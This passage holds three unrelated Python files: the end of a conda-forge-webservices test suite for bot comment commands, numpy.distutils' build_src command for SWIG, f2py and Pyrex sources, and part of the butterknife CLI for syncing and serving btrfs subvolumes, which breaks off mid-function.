'yo @conda-forge-admin: please update for conda build 3',
'yo @conda-forge-admin: update for conda build 3',
], [
'@conda-forge-admin, please lint'
'@conda-forge-admin, lint'
]),
(update_team, [
'@conda-forge-admin: please update team',
'@conda-forge-admin: update team',
'@conda-forge-admin, please update the team',
'@conda-forge-admin, update the team',
'@conda-forge-admin, please refresh team',
'@conda-forge-admin, refresh team',
], [
'@conda-forge-admin please make noarch: python',
'@conda-forge-admin make noarch: python',
'@conda-forge-linter, please lint. and can someone refresh the team?',
'@conda-forge-linter, lint. and can someone refresh the team?',
]),
(update_circle, [
'@conda-forge-admin, please update circle',
'@conda-forge-admin, update circle',
'hey @conda-forge-admin, PLEASE update circle',
'hey @conda-forge-admin, update circle',
'@conda-forge-admin: please refresh the circle key',
'@conda-forge-admin: refresh the circle key',
], [
'@conda-forge-admin, please lint',
'@conda-forge-admin, lint',
]),
(add_py, [
'@conda-forge-admin, please add python 2.7',
'@conda-forge-admin, add python 2.7',
'@conda-forge-admin, please add py27',
'@conda-forge-admin, add py27',
'@conda-forge-admin: add PY27',
'something something. @conda-forge-admin: please add py27',
'@conda-forge-admin, please add python 3.6',
'@conda-forge-admin, add python 3.6',
'@conda-forge-admin, please add py36',
], [
'@conda-forge admin is pretty cool. please add py27?',
'@conda-forge admin is pretty cool. rerun add py27?',
'@conda-forge-admin, go ahead and rerun add python 2.7',
'please add python 2.7, @conda-forge-admin',
'add py27, @conda-forge-admin',
]),
(add_user, [
'@conda-forge-admin, please add user @blah',
'@conda-forge-admin, add user @blah',
'something something. @conda-forge-admin: please add user @blah',
], [
'@conda-forge admin is pretty cool. please add user @blah',
'@conda-forge admin is pretty cool. rerun add user @blah?',
'@conda-forge-admin, go ahead and rerun add user @blah?',
'please add user @blah, @conda-forge-admin',
'add user @blah, @conda-forge-admin',
]),
]
for command, should, should_not in commands:
issue = gh.return_value.get_repo.return_value.get_issue.return_value
repo = gh.return_value.get_repo.return_value
gh.return_value.get_repo.return_value.default_branch = "main"
for msg in should:
print(msg, end=' ' * 30 + '\r')
rerender_dummy_commit.reset_mock()
rerender_dummy_commit.return_value = True
command.reset_mock()
issue.reset_mock()
issue_comment(title="hi", comment=msg)
command.assert_called()
issue.edit.assert_not_called()
if command in (rerender, make_noarch, update_cb3, add_py):
rerender_dummy_commit.assert_called()
else:
rerender_dummy_commit.assert_not_called()
if command is add_py:
if "2.7" in msg or "27" in msg:
command.assert_called_with(
git_repo.clone_from.return_value, "2.7")
else:
command.assert_called_with(
git_repo.clone_from.return_value, "3.6")
if command is add_user:
command.assert_called_with(
git_repo.clone_from.return_value, "blah")
rerender_dummy_commit.reset_mock()
rerender_dummy_commit.return_value = True
command.reset_mock()
issue.reset_mock()
issue_comment(title=msg, comment=None)
command.assert_called()
if (
command in (
rerender, make_noarch, update_cb3, add_bot_automerge, add_py,
add_user
)
):
assert "Fixes #" in repo.create_pull.call_args[0][1]
else:
issue.edit.assert_called_with(state="closed")
if command in (rerender, make_noarch, update_cb3, add_py):
rerender_dummy_commit.assert_called()
else:
rerender_dummy_commit.assert_not_called()
if command is add_py:
if "2.7" in msg or "27" in msg:
command.assert_called_with(
git_repo.clone_from.return_value, "2.7")
else:
command.assert_called_with(
git_repo.clone_from.return_value, "3.6")
if command is add_user:
command.assert_called_with(
git_repo.clone_from.return_value, "blah")
rerender_dummy_commit.reset_mock()
rerender_dummy_commit.return_value = True
command.reset_mock()
print(msg, end=' ' * 30 + '\r')
issue_comment(msg, msg, repo_name='staged-recipes')
command.assert_not_called()
rerender_dummy_commit.assert_not_called()
for msg in should_not:
print(msg, end=' ' * 30 + '\r')
command.reset_mock()
issue.reset_mock()
issue_comment(title="hi", comment=msg)
command.assert_not_called()
issue.edit.assert_not_called()
@mock.patch('conda_forge_webservices.commands.rerender')
@mock.patch('conda_forge_webservices.commands.make_noarch')
@mock.patch('conda_forge_webservices.commands.relint')
@mock.patch('conda_forge_webservices.commands.update_team')
@mock.patch('conda_forge_webservices.commands.update_circle')
@mock.patch('conda_forge_webservices.commands.update_cb3')
@mock.patch('github.Github')
@mock.patch('conda_forge_webservices.commands.Repo')
def test_rerender_failure(
self, repo, gh, update_cb3, update_circle,
update_team, relint, make_noarch, rerender):
rerender.side_effect = RequestException
repo = gh.return_value.get_repo.return_value
pull_create_issue = repo.get_pull.return_value.create_issue_comment
msg = '@conda-forge-admin, please rerender'
pr_detailed_comment(msg)
rerender.assert_called()
assert 'ran into an issue with' in pull_create_issue.call_args[0][0]
assert (
'conda-forge/core for further assistance'
in pull_create_issue.call_args[0][0]
)
if __name__ == '__main__':
unittest.main()
| |
""" Build swig, f2py, pyrex sources.
"""
import os
import re
import sys
import shlex
import copy
from distutils.command import build_ext
from distutils.dep_util import newer_group, newer
from distutils.util import get_platform
from distutils.errors import DistutilsError, DistutilsSetupError
def have_pyrex():
try:
import Pyrex.Compiler.Main
return True
except ImportError:
return False
# this import can't be done here, as it uses numpy stuff only available
# after it's installed
#import numpy.f2py
from numpy.distutils import log
from numpy.distutils.misc_util import fortran_ext_match, \
appendpath, is_string, is_sequence, get_cmd
from numpy.distutils.from_template import process_file as process_f_file
from numpy.distutils.conv_template import process_file as process_c_file
def subst_vars(target, source, d):
"""Substitute any occurence of @foo@ by d['foo'] from source file into
target."""
var = re.compile('@([a-zA-Z_]+)@')
fs = open(source, 'r')
try:
ft = open(target, 'w')
try:
for l in fs.readlines():
m = var.search(l)
if m:
ft.write(l.replace('@%s@' % m.group(1), d[m.group(1)]))
else:
ft.write(l)
finally:
ft.close()
finally:
fs.close()
class build_src(build_ext.build_ext):
description = "build sources from SWIG, F2PY files or a function"
user_options = [
('build-src=', 'd', "directory to \"build\" sources to"),
('f2py-opts=', None, "list of f2py command line options"),
('swig=', None, "path to the SWIG executable"),
('swig-opts=', None, "list of SWIG command line options"),
('swig-cpp', None, "make SWIG create C++ files (default is autodetected from sources)"),
('f2pyflags=', None, "additional flags to f2py (use --f2py-opts= instead)"), # obsolete
('swigflags=', None, "additional flags to swig (use --swig-opts= instead)"), # obsolete
('force', 'f', "forcibly build everything (ignore file timestamps)"),
('inplace', 'i',
"ignore build-lib and put compiled extensions into the source " +
"directory alongside your pure Python modules"),
]
boolean_options = ['force','inplace']
help_options = []
def initialize_options(self):
self.extensions = None
self.package = None
self.py_modules = None
self.py_modules_dict = None
self.build_src = None
self.build_lib = None
self.build_base = None
self.force = None
self.inplace = None
self.package_dir = None
self.f2pyflags = None # obsolete
self.f2py_opts = None
self.swigflags = None # obsolete
self.swig_opts = None
self.swig_cpp = None
self.swig = None
def finalize_options(self):
self.set_undefined_options('build',
('build_base', 'build_base'),
('build_lib', 'build_lib'),
('force', 'force'))
if self.package is None:
self.package = self.distribution.ext_package
self.extensions = self.distribution.ext_modules
self.libraries = self.distribution.libraries or []
self.py_modules = self.distribution.py_modules or []
self.data_files = self.distribution.data_files or []
if self.build_src is None:
plat_specifier = ".%s-%s" % (get_platform(), sys.version[0:3])
self.build_src = os.path.join(self.build_base, 'src'+plat_specifier)
# py_modules_dict is used in build_py.find_package_modules
self.py_modules_dict = {}
if self.f2pyflags:
if self.f2py_opts:
log.warn('ignoring --f2pyflags as --f2py-opts already used')
else:
self.f2py_opts = self.f2pyflags
self.f2pyflags = None
if self.f2py_opts is None:
self.f2py_opts = []
else:
self.f2py_opts = shlex.split(self.f2py_opts)
if self.swigflags:
if self.swig_opts:
log.warn('ignoring --swigflags as --swig-opts already used')
else:
self.swig_opts = self.swigflags
self.swigflags = None
if self.swig_opts is None:
self.swig_opts = []
else:
self.swig_opts = shlex.split(self.swig_opts)
# use options from build_ext command
build_ext = self.get_finalized_command('build_ext')
if self.inplace is None:
self.inplace = build_ext.inplace
if self.swig_cpp is None:
self.swig_cpp = build_ext.swig_cpp
for c in ['swig','swig_opt']:
o = '--'+c.replace('_','-')
v = getattr(build_ext,c,None)
if v:
if getattr(self,c):
log.warn('both build_src and build_ext define %s option' % (o))
else:
log.info('using "%s=%s" option from build_ext command' % (o,v))
setattr(self, c, v)
def run(self):
log.info("build_src")
if not (self.extensions or self.libraries):
return
self.build_sources()
def build_sources(self):
if self.inplace:
self.get_package_dir = \
self.get_finalized_command('build_py').get_package_dir
self.build_py_modules_sources()
for libname_info in self.libraries:
self.build_library_sources(*libname_info)
if self.extensions:
self.check_extensions_list(self.extensions)
for ext in self.extensions:
self.build_extension_sources(ext)
self.build_data_files_sources()
self.build_npy_pkg_config()
def build_data_files_sources(self):
if not self.data_files:
return
log.info('building data_files sources')
from numpy.distutils.misc_util import get_data_files
new_data_files = []
for data in self.data_files:
if isinstance(data,str):
new_data_files.append(data)
elif isinstance(data,tuple):
d,files = data
if self.inplace:
build_dir = self.get_package_dir('.'.join(d.split(os.sep)))
else:
build_dir = os.path.join(self.build_src,d)
funcs = filter(lambda f:hasattr(f, '__call__'), files)
files = filter(lambda f:not hasattr(f, '__call__'), files)
for f in funcs:
if f.func_code.co_argcount==1:
s = f(build_dir)
else:
s = f()
if s is not None:
if isinstance(s,list):
files.extend(s)
elif isinstance(s,str):
files.append(s)
else:
raise TypeError(repr(s))
filenames = get_data_files((d,files))
new_data_files.append((d, filenames))
else:
raise TypeError(repr(data))
self.data_files[:] = new_data_files
def _build_npy_pkg_config(self, info, gd):
import shutil
template, install_dir, subst_dict = info
template_dir = os.path.dirname(template)
for k, v in gd.items():
subst_dict[k] = v
if self.inplace == 1:
generated_dir = os.path.join(template_dir, install_dir)
else:
generated_dir = os.path.join(self.build_src, template_dir,
install_dir)
generated = os.path.basename(os.path.splitext(template)[0])
generated_path = os.path.join(generated_dir, generated)
if not os.path.exists(generated_dir):
os.makedirs(generated_dir)
subst_vars(generated_path, template, subst_dict)
# Where to install relatively to install prefix
full_install_dir = os.path.join(template_dir, install_dir)
return full_install_dir, generated_path
def build_npy_pkg_config(self):
log.info('build_src: building npy-pkg config files')
# XXX: another ugly workaround to circumvent distutils brain damage. We
# need the install prefix here, but finalizing the options of the
# install command when only building sources cause error. Instead, we
# copy the install command instance, and finalize the copy so that it
# does not disrupt how distutils want to do things when with the
# original install command instance.
install_cmd = copy.copy(get_cmd('install'))
if not install_cmd.finalized == 1:
install_cmd.finalize_options()
build_npkg = False
gd = {}
if self.inplace == 1:
top_prefix = '.'
build_npkg = True
elif hasattr(install_cmd, 'install_libbase'):
top_prefix = install_cmd.install_libbase
build_npkg = True
if build_npkg:
for pkg, infos in self.distribution.installed_pkg_config.items():
pkg_path = self.distribution.package_dir[pkg]
prefix = os.path.join(os.path.abspath(top_prefix), pkg_path)
d = {'prefix': prefix}
for info in infos:
install_dir, generated = self._build_npy_pkg_config(info, d)
self.distribution.data_files.append((install_dir,
[generated]))
def build_py_modules_sources(self):
if not self.py_modules:
return
log.info('building py_modules sources')
new_py_modules = []
for source in self.py_modules:
if is_sequence(source) and len(source)==3:
package, module_base, source = source
if self.inplace:
build_dir = self.get_package_dir(package)
else:
build_dir = os.path.join(self.build_src,
os.path.join(*package.split('.')))
if hasattr(source, '__call__'):
target = os.path.join(build_dir, module_base + '.py')
source = source(target)
if source is None:
continue
modules = [(package, module_base, source)]
if package not in self.py_modules_dict:
self.py_modules_dict[package] = []
self.py_modules_dict[package] += modules
else:
new_py_modules.append(source)
self.py_modules[:] = new_py_modules
def build_library_sources(self, lib_name, build_info):
sources = list(build_info.get('sources',[]))
if not sources:
return
log.info('building library "%s" sources' % (lib_name))
sources = self.generate_sources(sources, (lib_name, build_info))
sources = self.template_sources(sources, (lib_name, build_info))
sources, h_files = self.filter_h_files(sources)
if h_files:
log.info('%s - nothing done with h_files = %s',
self.package, h_files)
#for f in h_files:
# self.distribution.headers.append((lib_name,f))
build_info['sources'] = sources
return
def build_extension_sources(self, ext):
sources = list(ext.sources)
log.info('building extension "%s" sources' % (ext.name))
fullname = self.get_ext_fullname(ext.name)
modpath = fullname.split('.')
package = '.'.join(modpath[0:-1])
if self.inplace:
self.ext_target_dir = self.get_package_dir(package)
sources = self.generate_sources(sources, ext)
sources = self.template_sources(sources, ext)
sources = self.swig_sources(sources, ext)
sources = self.f2py_sources(sources, ext)
sources = self.pyrex_sources(sources, ext)
sources, py_files = self.filter_py_files(sources)
if package not in self.py_modules_dict:
self.py_modules_dict[package] = []
modules = []
for f in py_files:
module = os.path.splitext(os.path.basename(f))[0]
modules.append((package, module, f))
self.py_modules_dict[package] += modules
sources, h_files = self.filter_h_files(sources)
if h_files:
log.info('%s - nothing done with h_files = %s',
package, h_files)
#for f in h_files:
# self.distribution.headers.append((package,f))
ext.sources = sources
def generate_sources(self, sources, extension):
new_sources = []
func_sources = []
for source in sources:
if is_string(source):
new_sources.append(source)
else:
func_sources.append(source)
if not func_sources:
return new_sources
if self.inplace and not is_sequence(extension):
build_dir = self.ext_target_dir
else:
if is_sequence(extension):
name = extension[0]
# if 'include_dirs' not in extension[1]:
# extension[1]['include_dirs'] = []
# incl_dirs = extension[1]['include_dirs']
else:
name = extension.name
# incl_dirs = extension.include_dirs
#if self.build_src not in incl_dirs:
# incl_dirs.append(self.build_src)
build_dir = os.path.join(*([self.build_src]\
+name.split('.')[:-1]))
self.mkpath(build_dir)
for func in func_sources:
source = func(extension, build_dir)
if not source:
continue
if is_sequence(source):
[log.info(" adding '%s' to sources." % (s,)) for s in source]
new_sources.extend(source)
else:
log.info(" adding '%s' to sources." % (source,))
new_sources.append(source)
return new_sources
def filter_py_files(self, sources):
return self.filter_files(sources,['.py'])
def filter_h_files(self, sources):
return self.filter_files(sources,['.h','.hpp','.inc'])
def filter_files(self, sources, exts = []):
new_sources = []
files = []
for source in sources:
(base, ext) = os.path.splitext(source)
if ext in exts:
files.append(source)
else:
new_sources.append(source)
return new_sources, files
def template_sources(self, sources, extension):
new_sources = []
if is_sequence(extension):
depends = extension[1].get('depends')
include_dirs = extension[1].get('include_dirs')
else:
depends = extension.depends
include_dirs = extension.include_dirs
for source in sources:
(base, ext) = os.path.splitext(source)
if ext == '.src': # Template file
if self.inplace:
target_dir = os.path.dirname(base)
else:
target_dir = appendpath(self.build_src, os.path.dirname(base))
self.mkpath(target_dir)
target_file = os.path.join(target_dir,os.path.basename(base))
if (self.force or newer_group([source] + depends, target_file)):
if _f_pyf_ext_match(base):
log.info("from_template:> %s" % (target_file))
outstr = process_f_file(source)
else:
log.info("conv_template:> %s" % (target_file))
outstr = process_c_file(source)
fid = open(target_file,'w')
fid.write(outstr)
fid.close()
if _header_ext_match(target_file):
d = os.path.dirname(target_file)
if d not in include_dirs:
log.info(" adding '%s' to include_dirs." % (d))
include_dirs.append(d)
new_sources.append(target_file)
else:
new_sources.append(source)
return new_sources
def pyrex_sources(self, sources, extension):
new_sources = []
ext_name = extension.name.split('.')[-1]
for source in sources:
(base, ext) = os.path.splitext(source)
if ext == '.pyx':
target_file = self.generate_a_pyrex_source(base, ext_name,
source,
extension)
new_sources.append(target_file)
else:
new_sources.append(source)
return new_sources
def generate_a_pyrex_source(self, base, ext_name, source, extension):
if self.inplace or not have_pyrex():
target_dir = os.path.dirname(base)
else:
target_dir = appendpath(self.build_src, os.path.dirname(base))
target_file = os.path.join(target_dir, ext_name + '.c')
depends = [source] + extension.depends
if self.force or newer_group(depends, target_file, 'newer'):
if have_pyrex():
import Pyrex.Compiler.Main
log.info("pyrexc:> %s" % (target_file))
self.mkpath(target_dir)
options = Pyrex.Compiler.Main.CompilationOptions(
defaults=Pyrex.Compiler.Main.default_options,
include_path=extension.include_dirs,
output_file=target_file)
pyrex_result = Pyrex.Compiler.Main.compile(source,
options=options)
if pyrex_result.num_errors != 0:
raise DistutilsError("%d errors while compiling %r with Pyrex" \
% (pyrex_result.num_errors, source))
elif os.path.isfile(target_file):
log.warn("Pyrex required for compiling %r but not available,"\
" using old target %r"\
% (source, target_file))
else:
raise DistutilsError("Pyrex required for compiling %r"\
" but notavailable" % (source,))
return target_file
def f2py_sources(self, sources, extension):
new_sources = []
f2py_sources = []
f_sources = []
f2py_targets = {}
target_dirs = []
ext_name = extension.name.split('.')[-1]
skip_f2py = 0
for source in sources:
(base, ext) = os.path.splitext(source)
if ext == '.pyf': # F2PY interface file
if self.inplace:
target_dir = os.path.dirname(base)
else:
target_dir = appendpath(self.build_src, os.path.dirname(base))
if os.path.isfile(source):
name = get_f2py_modulename(source)
if name != ext_name:
raise DistutilsSetupError('mismatch of extension names: %s '
'provides %r but expected %r' % (
source, name, ext_name))
target_file = os.path.join(target_dir,name+'module.c')
else:
log.debug(' source %s does not exist: skipping f2py\'ing.' \
% (source))
name = ext_name
skip_f2py = 1
target_file = os.path.join(target_dir,name+'module.c')
if not os.path.isfile(target_file):
log.warn(' target %s does not exist:\n '\
'Assuming %smodule.c was generated with '\
'"build_src --inplace" command.' \
% (target_file, name))
target_dir = os.path.dirname(base)
target_file = os.path.join(target_dir,name+'module.c')
if not os.path.isfile(target_file):
raise DistutilsSetupError("%r missing" % (target_file,))
log.info(' Yes! Using %r as up-to-date target.' \
% (target_file))
target_dirs.append(target_dir)
f2py_sources.append(source)
f2py_targets[source] = target_file
new_sources.append(target_file)
elif fortran_ext_match(ext):
f_sources.append(source)
else:
new_sources.append(source)
if not (f2py_sources or f_sources):
return new_sources
for d in target_dirs:
self.mkpath(d)
f2py_options = extension.f2py_options + self.f2py_opts
if self.distribution.libraries:
for name,build_info in self.distribution.libraries:
if name in extension.libraries:
f2py_options.extend(build_info.get('f2py_options',[]))
log.info("f2py options: %s" % (f2py_options))
if f2py_sources:
if len(f2py_sources) != 1:
raise DistutilsSetupError(
'only one .pyf file is allowed per extension module but got'\
' more: %r' % (f2py_sources,))
source = f2py_sources[0]
target_file = f2py_targets[source]
target_dir = os.path.dirname(target_file) or '.'
depends = [source] + extension.depends
if (self.force or newer_group(depends, target_file,'newer')) \
and not skip_f2py:
log.info("f2py: %s" % (source))
import numpy.f2py
numpy.f2py.run_main(f2py_options
+ ['--build-dir',target_dir,source])
else:
log.debug(" skipping '%s' f2py interface (up-to-date)" % (source))
else:
#XXX TODO: --inplace support for sdist command
if is_sequence(extension):
name = extension[0]
else: name = extension.name
target_dir = os.path.join(*([self.build_src]\
+name.split('.')[:-1]))
target_file = os.path.join(target_dir,ext_name + 'module.c')
new_sources.append(target_file)
depends = f_sources + extension.depends
if (self.force or newer_group(depends, target_file, 'newer')) \
and not skip_f2py:
log.info("f2py:> %s" % (target_file))
self.mkpath(target_dir)
import numpy.f2py
numpy.f2py.run_main(f2py_options + ['--lower',
'--build-dir',target_dir]+\
['-m',ext_name]+f_sources)
else:
log.debug(" skipping f2py fortran files for '%s' (up-to-date)"\
% (target_file))
if not os.path.isfile(target_file):
raise DistutilsError("f2py target file %r not generated" % (target_file,))
target_c = os.path.join(self.build_src,'fortranobject.c')
target_h = os.path.join(self.build_src,'fortranobject.h')
log.info(" adding '%s' to sources." % (target_c))
new_sources.append(target_c)
if self.build_src not in extension.include_dirs:
log.info(" adding '%s' to include_dirs." \
% (self.build_src))
extension.include_dirs.append(self.build_src)
if not skip_f2py:
import numpy.f2py
d = os.path.dirname(numpy.f2py.__file__)
source_c = os.path.join(d,'src','fortranobject.c')
source_h = os.path.join(d,'src','fortranobject.h')
if newer(source_c,target_c) or newer(source_h,target_h):
self.mkpath(os.path.dirname(target_c))
self.copy_file(source_c,target_c)
self.copy_file(source_h,target_h)
else:
if not os.path.isfile(target_c):
raise DistutilsSetupError("f2py target_c file %r not found" % (target_c,))
if not os.path.isfile(target_h):
raise DistutilsSetupError("f2py target_h file %r not found" % (target_h,))
for name_ext in ['-f2pywrappers.f','-f2pywrappers2.f90']:
filename = os.path.join(target_dir,ext_name + name_ext)
if os.path.isfile(filename):
log.info(" adding '%s' to sources." % (filename))
f_sources.append(filename)
return new_sources + f_sources
def swig_sources(self, sources, extension):
# Assuming SWIG 1.3.14 or later. See compatibility note in
# http://www.swig.org/Doc1.3/Python.html#Python_nn6
new_sources = []
swig_sources = []
swig_targets = {}
target_dirs = []
py_files = [] # swig generated .py files
target_ext = '.c'
if self.swig_cpp:
typ = 'c++'
is_cpp = True
else:
typ = None
is_cpp = False
skip_swig = 0
ext_name = extension.name.split('.')[-1]
for source in sources:
(base, ext) = os.path.splitext(source)
if ext == '.i': # SWIG interface file
if self.inplace:
target_dir = os.path.dirname(base)
py_target_dir = self.ext_target_dir
else:
target_dir = appendpath(self.build_src, os.path.dirname(base))
py_target_dir = target_dir
if os.path.isfile(source):
name = get_swig_modulename(source)
if name != ext_name[1:]:
raise DistutilsSetupError(
'mismatch of extension names: %s provides %r'
' but expected %r' % (source, name, ext_name[1:]))
if typ is None:
typ = get_swig_target(source)
is_cpp = typ=='c++'
if is_cpp: target_ext = '.cpp'
else:
typ2 = get_swig_target(source)
if typ!=typ2:
log.warn('expected %r but source %r defines %r swig target' \
% (typ, source, typ2))
if typ2=='c++':
log.warn('resetting swig target to c++ (some targets may have .c extension)')
is_cpp = True
target_ext = '.cpp'
else:
log.warn('assuming that %r has c++ swig target' % (source))
target_file = os.path.join(target_dir,'%s_wrap%s' \
% (name, target_ext))
else:
log.warn(' source %s does not exist: skipping swig\'ing.' \
% (source))
name = ext_name[1:]
skip_swig = 1
target_file = _find_swig_target(target_dir, name)
if not os.path.isfile(target_file):
log.warn(' target %s does not exist:\n '\
'Assuming %s_wrap.{c,cpp} was generated with '\
'"build_src --inplace" command.' \
% (target_file, name))
target_dir = os.path.dirname(base)
target_file = _find_swig_target(target_dir, name)
if not os.path.isfile(target_file):
raise DistutilsSetupError("%r missing" % (target_file,))
log.warn(' Yes! Using %r as up-to-date target.' \
% (target_file))
target_dirs.append(target_dir)
new_sources.append(target_file)
py_files.append(os.path.join(py_target_dir, name+'.py'))
swig_sources.append(source)
swig_targets[source] = new_sources[-1]
else:
new_sources.append(source)
if not swig_sources:
return new_sources
if skip_swig:
return new_sources + py_files
for d in target_dirs:
self.mkpath(d)
swig = self.swig or self.find_swig()
swig_cmd = [swig, "-python"]
if is_cpp:
swig_cmd.append('-c++')
for d in extension.include_dirs:
swig_cmd.append('-I'+d)
for source in swig_sources:
target = swig_targets[source]
depends = [source] + extension.depends
if self.force or newer_group(depends, target, 'newer'):
log.info("%s: %s" % (os.path.basename(swig) \
+ (is_cpp and '++' or ''), source))
self.spawn(swig_cmd + self.swig_opts \
+ ["-o", target, '-outdir', py_target_dir, source])
else:
log.debug(" skipping '%s' swig interface (up-to-date)" \
% (source))
return new_sources + py_files
_f_pyf_ext_match = re.compile(r'.*[.](f90|f95|f77|for|ftn|f|pyf)\Z',re.I).match
_header_ext_match = re.compile(r'.*[.](inc|h|hpp)\Z',re.I).match
#### SWIG related auxiliary functions ####
_swig_module_name_match = re.compile(r'\s*%module\s*(.*\(\s*package\s*=\s*"(?P<package>[\w_]+)".*\)|)\s*(?P<name>[\w_]+)',
re.I).match
_has_c_header = re.compile(r'-[*]-\s*c\s*-[*]-',re.I).search
_has_cpp_header = re.compile(r'-[*]-\s*c[+][+]\s*-[*]-',re.I).search
def get_swig_target(source):
f = open(source,'r')
result = 'c'
line = f.readline()
if _has_cpp_header(line):
result = 'c++'
if _has_c_header(line):
result = 'c'
f.close()
return result
def get_swig_modulename(source):
f = open(source,'r')
f_readlines = getattr(f,'xreadlines',f.readlines)
name = None
for line in f_readlines():
m = _swig_module_name_match(line)
if m:
name = m.group('name')
break
f.close()
return name
def _find_swig_target(target_dir,name):
for ext in ['.cpp','.c']:
target = os.path.join(target_dir,'%s_wrap%s' % (name, ext))
if os.path.isfile(target):
break
return target
#### F2PY related auxiliary functions ####
_f2py_module_name_match = re.compile(r'\s*python\s*module\s*(?P<name>[\w_]+)',
re.I).match
_f2py_user_module_name_match = re.compile(r'\s*python\s*module\s*(?P<name>[\w_]*?'\
'__user__[\w_]*)',re.I).match
def get_f2py_modulename(source):
name = None
f = open(source)
f_readlines = getattr(f,'xreadlines',f.readlines)
for line in f_readlines():
m = _f2py_module_name_match(line)
if m:
if _f2py_user_module_name_match(line): # skip *__user__* names
continue
name = m.group('name')
break
f.close()
return name
##########################################
| |
import os
import click
from urllib.parse import urlparse
import json
import urllib.request
import configparser
import subprocess
from butterknife.pool import LocalPool
from butterknife.subvol import Subvol
def pool_factory(url):
o = urlparse(url)
if o.scheme == "file":
from butterknife.pool import LocalPool
assert not o.netloc, "Username, hostname or port not supported for file:// transport"
assert not o.password
assert not o.fragment
assert not o.query
return LocalPool(o.path)
if o.scheme in ("http", "https"):
from butterknife.transport.http import WebPool
return WebPool(o.hostname, o.port, o.path, secure=o.scheme=="https")
if o.scheme == "ssh":
from butterknife.transport.ssh import SecureShellPool
return SecureShellPool(o.hostname, o.port, o.path, o.username)
def push_pull(source, destination, subvol):
subvol_filter = Filter(subvol)
for namespace, identifier, architectures in source.template_list(subvol_filter):
for architecture in architectures:
click.echo("Processing %s.%s:%s" % (namespace, identifier, architecture))
subset_filter = subvol_filter.subset(
namespace=namespace, identifier=identifier, architecture=architecture)
source_subvols = sorted(subset_filter.apply(source.subvol_list()))
destination_subvols = sorted(subset_filter.apply(destination.subvol_list()))
click.echo("%d subvolumes at %s" % (len(source_subvols), source))
click.echo("%d subvolumes at %s" % (len(destination_subvols), destination))
common_subvols = set(source_subvols).intersection(set(destination_subvols))
if common_subvols:
parent_subvol = sorted(common_subvols)[-1]
click.echo("Last common subvol is: %s" % parent_subvol)
following_subvols = tuple(filter(lambda subvol: subvol.numeric_version > parent_subvol.numeric_version, source_subvols))
click.echo("Neet to get %d subvolumes" % len(following_subvols))
else:
parent_subvol = None
following_subvols = source_subvols
click.echo("No shared subvolumes!")
if not following_subvols:
click.echo("All versions of %s.%s:%s synchronized, skipping!" % (namespace, identifier, architecture))
continue
for subvol in following_subvols:
if parent_subvol:
click.echo("Fetching incremental snapshot %s relative to %s" % (subvol.version, parent_subvol.version))
else:
click.echo("Fetching full snapshot %s" % subvol.version)
btrfs_send = source.send(subvol, parent_subvol)
pv = subprocess.Popen(("pv",), stdin=btrfs_send.stdout, stdout=subprocess.PIPE, close_fds=True)
btrfs_receive = destination.receive(pv.stdout, subvol, parent_subvol)
btrfs_receive.communicate()
if btrfs_receive.returncode or btrfs_send.returncode or pv.returncode:
exit(255)
parent_subvol = subvol
@click.command(help="Pull subvolumes")
@click.argument("pool")
@click.option("-s", "--subvol", default="@template:*.*:*:*", help="Subvolume filter")
def pull(pool, subvol):
click.echo("Pulling %s from %s to local pool" % (subvol, pool))
push_pull(pool_factory(pool), LocalPool(), subvol)
@click.command(help="Push subvolumes")
@click.argument("pool")
@click.option("-s", "--subvol", default="@template:*.*:*:*", help="Subvolume filter")
def push(pool, subvol):
click.echo("Pushing %s from local pool to %s" % (subvol, pool))
push_pull(LocalPool(), pool_factory(pool), subvol)
@click.command(help="List local or remote subvolumes")
@click.argument("pool", default="file://")
@click.option("--subvol", default="@template:*.*:*:*", help="Subvolume filter")
def list(subvol, pool):
click.echo("Listing %s in %s" % (subvol, pool))
pool = pool_factory(pool)
for template in Filter(subvol).apply(pool.subvol_list()):
click.echo("%s%s" % (pool, template))
class Filter(object):
def __init__(self, pattern="@template:*.*:*:*"):
self.category, name, self.architecture, self.version = pattern.split(":")
self.namespace, self.identifier = name.rsplit(".", 1)
def match(self, subvol):
if self.category != "*" and self.category != subvol.category:
# print("Category %s fails filter %s" % (self.category, subvol.category))
return False
if self.namespace != "*" and self.namespace != subvol.namespace:
# print("Namespace %s fails filter %s" % (self.namespace, subvol.namespace))
return False
if self.identifier != "*" and self.identifier != subvol.identifier: # TODO: specify ,
# print("Identifier %s fails filter %s" % (self.identifier, subvol.identifier))
return False
if self.architecture != "*" and self.architecture != subvol.architecture: # TODO: specify ,
# print("Architecture %s fails filter %s" % (self.architecture, subvol.architecture))
return False
if self.version != "*" and self.version != subvol.version: # TODO: specify , and -
# print("Version %s fails filter %s" % (self.version, subvol.version))
return False
return True
def apply(self, iterable):
for i in iterable:
if self.match(i):
yield i
def subset(self, namespace="*", identifier="*", architecture="*", version="*"):
return Filter(
"%s:%s.%s:%s:%s" % (
self.category,
self.namespace if namespace == "*" else namespace,
self.identifier if identifier == "*" else identifier,
self.architecture if architecture == "*" else architecture,
self.version if version == "*" else version))
@click.command("serve", help="Run built-in HTTP server")
@click.argument("subvol", default="@template:*.*:*:*")
@click.option("-u", "--user", default=None, help="Run as user")
@click.option("-p", "--port", default=80, help="Listen port")
@click.option("-l", "--listen", default="0.0.0.0", help="Listen address")
def serve(subvol, user, port, listen):
subvol_filter = Filter(subvol)
pool = LocalPool()
click.echo("Serving %s from %s at %s:%d" % (subvol, pool, listen, port))
from butterknife.api import TemplateResource, VersionResource, LegacyStreamingResource, SubvolResource, StreamResource
import pwd
import falcon
from wsgiref.simple_server import make_server, WSGIServer
from socketserver import ThreadingMixIn
class ThreadingWSGIServer(ThreadingMixIn, WSGIServer):
pass
print("Listening on %s:%d" % (listen, port))
app = falcon.API()
app.add_route("/api/template/", TemplateResource(pool, subvol_filter))
app.add_route("/api/template/{name}/arch/{arch}/version/", VersionResource(pool, subvol_filter))
app.add_route("/api/template/{name}/arch/{arch}/version/{version}/stream/", LegacyStreamingResource(pool, subvol_filter))
app.add_route("/api/subvol/", SubvolResource(pool, subvol_filter))
app.add_route("/api/subvol/@{subvol}/", StreamResource(pool, subvol_filter))
app.add_route("/", SubvolResource(pool, subvol_filter))
app.add_route("/@{subvol}/", StreamResource(pool, subvol_filter))
httpd = make_server(listen, port, app, ThreadingWSGIServer)
if user:
_, _, uid, gid, gecos, root, shell = pwd.getpwnam(user)
sudoer = os.path.join("/etc/sudoers.d", user)
if uid == 0:
print("Please specify unprivileged user, eg 'butterknife'")
exit(254)
elif not os.path.exists(sudoer):
